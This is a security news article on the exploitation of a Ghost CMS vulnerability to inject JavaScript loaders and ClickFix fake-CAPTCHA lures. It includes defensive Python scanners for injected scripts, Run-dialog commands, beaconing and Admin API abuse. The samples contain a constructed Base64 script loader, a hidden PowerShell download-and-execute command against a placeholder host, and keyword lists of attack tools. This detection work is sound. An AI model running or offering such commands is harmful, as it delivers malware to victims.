A critical vulnerability in Ghost CMS, tracked as CVE-2026-26980, has been exploited in a large-scale malware campaign. Security researchers confirmed that more than 700 websites were compromised. The flaw carries a CVSS score of 9.4, which places it in the critical range. Many of the targeted websites were running outdated, unpatched versions of Ghost CMS.

Researchers from QiAnXin XLab said the attackers gained unauthorized access through Ghost's Content API, stole Admin API keys, and used those keys to inject malicious JavaScript into the sites' pages. The compromised sites then silently served malware to their visitors with no change the owners would notice. Ghost fixed the vulnerability in version 6.19.1 earlier this year; the affected sites had not applied that update.

The injected code is a small JavaScript loader appended near the bottom of each page. When a visitor loads the page, the loader contacts attacker-controlled servers and fetches the next-stage payload at runtime. Because the second stage is downloaded on every visit rather than stored on the site, the operators can change the malware without touching the compromised sites again.
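One way to audit a site for this kind of injected loader, as an added example that is not part of the original report or of Ghost's own tooling: the scanner below parses a rendered page, lists every `<script>` element, and flags external scripts whose host is not in an allowlist plus inline scripts that use dynamic-loading constructs (`createElement('script')`, `atob(`, `eval(` and similar). The sample page, the allowlist and every hostname in it are constructed for the example and are not campaign indicators.

```python
"""Scan rendered HTML for injected script loaders (added example, not XLab's or Ghost's code)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructs typically used by an inline stub that fetches and runs a second stage at runtime.
LOADER_MARKERS = (
    "createElement('script')", 'createElement("script")',
    "atob(", "eval(", "String.fromCharCode", "document.write(",
)


class _ScriptCollector(HTMLParser):
    """Collect every <script> element with its src attribute, inline body and line number."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = {"src": dict(attrs).get("src"), "body": "", "line": self.getpos()[0]}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data  # script bodies may arrive in several chunks

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def find_suspicious_scripts(html, allowed_hosts):
    """Return findings for external scripts from unlisted hosts and for inline loader stubs."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for script in collector.scripts:
        if script["src"]:
            host = urlparse(script["src"]).hostname
            if host is None:  # relative URL: served by the site itself
                continue
            if host not in allowed_hosts:
                findings.append({"line": script["line"], "src": script["src"],
                                 "reason": f"external script from unlisted host {host}"})
        else:
            hits = [m for m in LOADER_MARKERS if m in script["body"]]
            if hits:
                findings.append({"line": script["line"], "src": None,
                                 "reason": "inline loader pattern: " + ", ".join(hits)})
    return findings


# Constructed sample page: a theme script, an allowed CDN, then two injected elements
# appended before </body>. Hostnames are placeholders, not indicators from the campaign.
ALLOWED_HOSTS = {"cdn.jsdelivr.net"}
SAMPLE_PAGE = """<!doctype html>
<html><head><title>Example Ghost site</title>
<script src="/assets/built/main.js"></script>
<script src="https://cdn.jsdelivr.net/npm/example@1/lib.js"></script>
</head><body>
<p>Regular post content.</p>
<script src="https://static.not-the-site.example/l.js"></script>
<script>
(function(){var s=document.createElement('script');s.src=atob('aHR0cHM6Ly9sb2FkZXIuZXhhbXBsZS9wLmpz');document.body.appendChild(s);})();
</script>
</body></html>"""


def audit_sample():
    """Run the scanner over the constructed page; two findings are expected."""
    return find_suspicious_scripts(SAMPLE_PAGE, ALLOWED_HOSTS)


if __name__ == "__main__":
    for f in audit_sample():
        print(f"line {f['line']}: {f['reason']}")
```

Run it against the HTML the site actually serves to visitors (fetched with a browser-like User-Agent, since the campaign cloaks), not against the theme files on disk, because the injected footer is rendered into the page rather than stored in the theme.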

The campaign also used cloaking through Adspect, a commercial traffic-filtering service. The filter collected browser-fingerprint details from each visitor and used them to decide who should receive the malicious content: some users were shown a harmless page, while selected targets were redirected into the attack chain. This made the campaign harder for researchers and security tools to observe and reproduce.

Selected victims were redirected to fake CAPTCHA verification pages designed to look trustworthy. These pages instructed users to paste a Base64-encoded command into the Windows Run dialog, the social-engineering pattern known as ClickFix that has been seen repeatedly in recent months. Once the command ran, malware was downloaded onto the victim's computer.
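What the pasted string actually does is quick to check on a suspect machine: Windows keeps Run-dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and PowerShell's -EncodedCommand takes Base64 of UTF-16LE text. The helper below is an added triage example, not code from the report; the sample entry is constructed and assumes the PowerShell -enc form, which the article does not specify, and the URL inside it is a placeholder.

```python
"""Decode and triage a ClickFix-style Run-dialog command (added example, not from the report)."""
import base64
import re

# Any run of Base64 alphabet long enough to be a payload rather than an ordinary word.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
LOLBINS = ("powershell", "pwsh", "mshta", "rundll32", "regsvr32", "certutil",
           "curl", "bitsadmin", "wscript", "cscript", "msiexec")
PAYLOAD_HINTS = ("iex", "invoke-expression", "iwr", "invoke-webrequest",
                 "downloadstring", "frombase64string", "http://", "https://",
                 "-enc", "hidden", "bypass")


def decode_blob(blob):
    """Decode one Base64 token; prefer UTF-16LE (PowerShell -EncodedCommand), then UTF-8."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    # ASCII text encoded as UTF-16LE has a zero byte in every odd position.
    if len(raw) % 2 == 0 and raw[1::2] == b"\x00" * (len(raw) // 2):
        return raw.decode("utf-16le")
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    # A random word that happens to look like Base64 decodes to binary junk; drop it.
    return text if all(c.isprintable() or c.isspace() for c in text) else None


def triage_clickfix(command):
    """Return decoded payloads, matched indicators and a verdict for one Run-dialog entry."""
    decoded = [t for t in (decode_blob(m.group(0)) for m in B64_TOKEN.finditer(command)) if t]
    surface = (command + " " + " ".join(decoded)).lower()
    lolbin_hits = [k for k in LOLBINS if k in surface]
    hint_hits = [k for k in PAYLOAD_HINTS if k in surface]
    return {
        "decoded": decoded,
        "indicators": sorted(set(lolbin_hits + hint_hits)),
        # An encoded blob handed to a living-off-the-land binary is the ClickFix shape.
        "suspicious": bool(decoded) and bool(lolbin_hits),
    }


# Constructed sample: the inner command is what the victim actually runs, wrapped the way
# -EncodedCommand expects (UTF-16LE, then Base64). The stage URL is a placeholder.
_INNER = "iex (iwr http://stage.example/p.ps1 -UseBasicParsing)"
SAMPLE_RUN_ENTRY = ("powershell -w hidden -ep bypass -enc "
                    + base64.b64encode(_INNER.encode("utf-16le")).decode())


if __name__ == "__main__":
    result = triage_clickfix(SAMPLE_RUN_ENTRY)
    print("suspicious:", result["suspicious"])
    for text in result["decoded"]:
        print("decoded:", text)
    print("indicators:", ", ".join(result["indicators"]))
```

On the victim the same string also appears as the command line of the resulting powershell.exe process (Security event 4688 with command-line auditing enabled, or Sysmon event ID 1), which is the place to confirm that the pasted command was actually executed.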

The downloaded ZIP archives contained batch scripts and PowerShell commands that installed further malicious components. In some variants a DLL was launched through rundll32.exe to continue the chain; other variants delivered JavaScript-based payloads instead of a DLL. After infection the malware beaconed to attacker-controlled servers every 30 seconds.
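A fixed 30-second beacon stands out in proxy or firewall logs once requests are grouped by source and destination and their inter-arrival times are examined. The helper below is an added example, not part of the XLab analysis: it reads a constructed, simplified log format (timestamp, source IP, destination host, method, path) and flags pairs whose median gap is near the expected period with low jitter. Addresses and hostnames are placeholders; a real log needs its own line parser, but the timing logic is the same.

```python
"""Flag fixed-interval beaconing in connection logs (added example, not from the report)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median, pstdev

# Constructed line format: "<ISO-8601 UTC> <src ip> <dst host> <method> <path>".
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<method>\S+) (?P<path>\S+)$")


def find_beacons(lines, period=30.0, tolerance=0.2, min_hits=5):
    """Return (src, dst) pairs whose request gaps cluster around `period` seconds.

    A pair is flagged when it has at least `min_hits` requests, its median gap lies within
    tolerance*period of the period, and its relative jitter (stdev / median) is at most
    `tolerance`. Ordinary browsing is bursty and irregular and fails both tests.
    """
    times_by_pair = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        times_by_pair[(m["src"], m["dst"])].append(ts)

    flagged = []
    for (src, dst), times in times_by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        med = median(gaps)
        if med <= 0:
            continue
        jitter = pstdev(gaps) / med
        if abs(med - period) <= tolerance * period and jitter <= tolerance:
            flagged.append({"src": src, "dst": dst, "hits": len(times),
                            "median_gap": med, "jitter": round(jitter, 3)})
    return flagged


def _build_sample():
    """Constructed log: ten beacons at roughly 30 s (with small drift) plus irregular browsing."""
    base = datetime(2026, 5, 7, 10, 0, 0)
    lines = []
    for i, drift in enumerate((0, 1, -1, 0, 2, 0, -1, 1, 0, 0)):
        t = base + timedelta(seconds=30 * i + drift)
        lines.append(f"{t:%Y-%m-%dT%H:%M:%SZ} 10.0.0.5 gate.c2-placeholder.test POST /gate")
    for offset in (3, 47, 52, 180, 181, 260):
        t = base + timedelta(seconds=offset)
        lines.append(f"{t:%Y-%m-%dT%H:%M:%SZ} 10.0.0.5 www.example.com GET /news")
    return lines


SAMPLE_CONN_LOG = _build_sample()


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_CONN_LOG):
        print(f"{hit['src']} -> {hit['dst']}: {hit['hits']} hits, "
              f"median gap {hit['median_gap']:.0f}s, jitter {hit['jitter']}")
```

The period and tolerance are parameters because the 30-second interval is specific to this campaign; run the same check with a range of periods, or simply report the median gap and jitter for every pair, to catch implants that sleep for a different fixed interval.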

Researchers also found that one payload was a modified build of the open-source Grape desktop client, which gave the attackers the ability to execute JavaScript and launch executables on infected systems remotely. The compromised sites belonged to universities, AI platforms, fintech companies, SaaS providers, blockchain services, and media organizations. Because the fake CAPTCHA pages were reached from trusted websites, users were more likely to follow their instructions.

Security experts urge Ghost CMS administrators to update to the latest patched version immediately, rotate their Admin API keys, remove any injected scripts, and review access logs for unauthorized API use. Researchers said the malicious activity was first detected on May 7, 2026, and may involve at least two threat groups. The incident shows how dangerous a CMS vulnerability becomes when attackers use trusted websites to distribute malware.
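Reviewing the access log, as advised above, means looking for Admin API use that the site's own operators did not generate. The script below is an added example (not from the report or from Ghost): it parses nginx combined-format lines from a reverse proxy in front of Ghost and flags writes under `/ghost/api/admin/` from addresses outside a trusted set, plus any untrusted read of the integrations or settings endpoints, which are assumed here to be where Admin API keys and site-wide code injection are managed. The `/ghost/api/admin/` and `/ghost/api/content/` prefixes are Ghost's current ones; the log lines, addresses (RFC 5737 ranges) and trusted set are constructed for the example.

```python
"""Review nginx access logs for unauthorized Ghost Admin API use (added example, not Ghost's code)."""
import re
from collections import Counter

# nginx "combined" log format.
NGINX_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
ADMIN_PREFIX = "/ghost/api/admin/"
WRITE_METHODS = {"POST", "PUT", "DELETE"}
# Endpoints assumed to hold Admin API keys (integrations) and site-wide code injection (settings).
SENSITIVE = ("/ghost/api/admin/integrations/", "/ghost/api/admin/settings/")


def review_admin_api_log(lines, trusted_ips):
    """Return (findings, admin_calls_per_ip) for Admin API activity outside trusted_ips."""
    findings = []
    calls_per_ip = Counter()
    for line in lines:
        m = NGINX_RE.match(line.strip())
        if not m or not m["path"].startswith(ADMIN_PREFIX):
            continue  # Content API reads and ordinary page views are not in scope here
        ip, method, path = m["ip"], m["method"], m["path"].split("?", 1)[0]
        calls_per_ip[ip] += 1
        if ip in trusted_ips:
            continue
        if method in WRITE_METHODS:
            reason = f"{method} to Admin API from untrusted address"
        elif any(path.startswith(p) for p in SENSITIVE):
            reason = "read of key/code-injection endpoint from untrusted address"
        else:
            continue
        findings.append({"ip": ip, "time": m["ts"], "method": method, "path": path,
                         "status": int(m["status"]), "ua": m["ua"], "reason": reason})
    return findings, calls_per_ip


# Constructed sample: a Content API read, two Admin API calls from an unknown scripted
# client, and a routine post edit from the known editor address.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [07/May/2026:10:02:11 +0000] "GET /ghost/api/content/posts/?key=abc123 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [07/May/2026:10:03:40 +0000] "GET /ghost/api/admin/integrations/ HTTP/1.1" 200 2210 "-" "python-requests/2.31"',
    '198.51.100.9 - - [07/May/2026:10:03:52 +0000] "PUT /ghost/api/admin/settings/ HTTP/1.1" 200 1840 "-" "python-requests/2.31"',
    '192.0.2.10 - - [07/May/2026:10:10:00 +0000] "PUT /ghost/api/admin/posts/5f1/ HTTP/1.1" 200 3300 "-" "Mozilla/5.0"',
]
TRUSTED_IPS = {"192.0.2.10"}


def review_sample():
    """Run the review over the constructed log; two findings for 198.51.100.9 are expected."""
    return review_admin_api_log(SAMPLE_ACCESS_LOG, TRUSTED_IPS)


if __name__ == "__main__":
    findings, per_ip = review_sample()
    for f in findings:
        print(f"{f['time']} {f['ip']} {f['method']} {f['path']} {f['status']} {f['ua']}: {f['reason']}")
    print("Admin API calls per address:", dict(per_ip))
```

A successful (status 200) write to the settings endpoint from an unfamiliar address and client is exactly the trace a key-theft-then-inject sequence leaves behind; treat every Admin API key that was valid at that time as compromised and rotate it, rather than only the one the attacker happened to use.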

Stay alert, and keep your security measures updated!

Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news